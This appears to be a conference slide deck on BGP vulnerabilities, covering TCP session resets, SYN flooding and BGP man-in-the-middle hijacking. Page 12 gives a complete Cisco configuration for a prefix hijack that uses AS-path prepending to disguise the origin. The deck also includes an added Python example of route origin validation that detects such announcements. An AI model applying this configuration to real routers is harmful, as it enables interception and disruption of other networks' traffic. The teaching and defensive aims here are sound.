TIME TO SHUTDOWN INTERNET CORE ROUTER HTTP://IPSECS.COM
Page 1: BGP Vulnerability

TIME TO SHUTDOWN INTERNET CORE ROUTER

HTTP://IPSECS.COM

Page 2: BGP Vulnerability

COMMUNICATION

Analog communication

Digital communication

Analog communication to digital communication convergence

Internet Protocol

Page 3: BGP Vulnerability

FUTURE COMMUNICATION

IP based communication will become the core communication?

Scalability and reliability communication infrastructure?

Vulnerability and security threat?

Page 4: BGP Vulnerability

CORE COMMUNICATION

Access Control List?

Default password issue?

Weak password?

Unencrypted remote login?

Routing protocol vulnerability?

We will focus on Border Gateway Protocol (BGP) now

Page 5: BGP Vulnerability

BGP VULNERABILITY

BGP messages

TCP vulnerability

BGP internet man in the middle

Documented in RFC 4272

Page 6: BGP Vulnerability

BGP MESSAGES

BGP states? idle, connect, active, opensent, openconfirm, established

BGP message? open, update, notification, keepalive

BGP message modification to poison routing table and Denial of Service

Complex and nearly impractical

Page 7: BGP Vulnerability
Page 8: BGP Vulnerability

TCP VULNERABILITY

BGP and TCP port 179

Spoofed TCP RST/FIN?

TCP port flooding (SYN)

TCP session ends = BGP idle

Page 9: BGP Vulnerability
Page 10: BGP Vulnerability

BGP MAN IN THE MIDDLE

More specific network prefix wins

Use traceroute to identify routing from source to destination

Use route-map and AS-PATH prepending

Static routing to give information about next-hop-router

Page 11: BGP Vulnerability
Page 12: BGP Vulnerability

router bgp 100
 network 10.10.220.0 mask 255.255.255.0
 neighbor 2.2.4.2 remote-as 40
 neighbor 2.2.4.2 prefix-list JACKED out
 neighbor 2.2.4.2 route-map HIJACK out
 neighbor 4.3.2.1 remote-as 10
 neighbor 4.3.2.1 prefix-list ANN out
 neighbor 5.4.3.1 remote-as 60
 neighbor 5.4.3.1 prefix-list JACKED out
 neighbor 5.4.3.1 route-map HIJACK out
!
ip route 10.10.220.0 255.255.255.0 4.3.2.1
!
ip prefix-list ANN seq 10 permit 2.2.4.0/24
ip prefix-list ANN seq 15 permit 4.3.2.0/24
ip prefix-list ANN seq 20 permit 5.4.3.0/24
!
ip prefix-list JACKED seq 10 permit 2.2.4.0/24
ip prefix-list JACKED seq 15 permit 4.3.2.0/24
ip prefix-list JACKED seq 20 permit 5.4.3.0/24
ip prefix-list JACKED seq 25 permit 10.10.220.0/24
route-map HIJACK permit 10
 set as-path prepend 10 20 200
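
One way a prefix owner or upstream could flag the announcement pattern above, as an added example that is not from the original slides: route origin validation in the style of RFC 6811, where a more-specific announcement fails the maximum-length check even when a prepended path ends in the expected origin AS. The authorised /22, AS 200 as the owner, and the observed AS paths are constructed assumptions.

```python
import ipaddress
from typing import NamedTuple

class Vrp(NamedTuple):
    """One authorisation: origin_as may announce prefix down to max_length."""
    prefix: ipaddress.IPv4Network
    max_length: int
    origin_as: int

# Constructed data: AS 200 may originate 10.10.220.0/22 and nothing more
# specific. The covering /22 and the owner AS are assumptions for the demo.
VRPS = [Vrp(ipaddress.ip_network("10.10.220.0/22"), 22, 200)]

def validate(prefix, as_path, vrps=VRPS):
    """Classify an announcement as valid / invalid / not-found (RFC 6811)."""
    if not as_path:
        raise ValueError("empty AS path")
    net = ipaddress.ip_network(prefix)
    origin = as_path[-1]  # rightmost AS is the claimed origin
    covering = [v for v in vrps
                if v.prefix.version == net.version and net.subnet_of(v.prefix)]
    if not covering:
        return "not-found", "no authorisation covers this prefix"
    if any(v.origin_as == origin and net.prefixlen <= v.max_length
           for v in covering):
        return "valid", "origin and prefix length authorised"
    if any(v.origin_as == origin for v in covering):
        return "invalid", f"/{net.prefixlen} exceeds authorised max length"
    return "invalid", f"AS{origin} is not an authorised origin"

# Constructed observations (prefix, AS path as seen by a route collector).
OBSERVED = [
    ("10.10.220.0/22", [40, 10, 20, 200]),       # covering route from the owner
    ("10.10.220.0/24", [40, 100, 10, 20, 200]),  # more specific, path ends in AS 200
    ("10.10.220.0/24", [60, 100]),               # more specific, different origin
    ("192.0.2.0/24", [40, 60]),                  # unrelated prefix, no data
]

def flag_invalid(observed=OBSERVED):
    """Return the announcements that fail origin validation, with the reason."""
    return [(p, path, why) for p, path in observed
            for state, why in [validate(p, path)] if state == "invalid"]

if __name__ == "__main__":
    for prefix, path, why in flag_invalid():
        print(f"INVALID {prefix} via {path}: {why}")
```

The second observation shows why the maximum length matters: an origin-only check would accept it, because the path still ends in AS 200.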

Page 13: BGP Vulnerability
Page 14: BGP Vulnerability

SOME POLICIES

Design and topology?

Access Control List implementation?

Complex password

Encrypted connection (SSH & HTTPS)

Page 15: BGP Vulnerability

DEMO BGP ATTACK

Page 16: BGP Vulnerability

QUESTION? ANSWER

Page 17: BGP Vulnerability

THANK YOU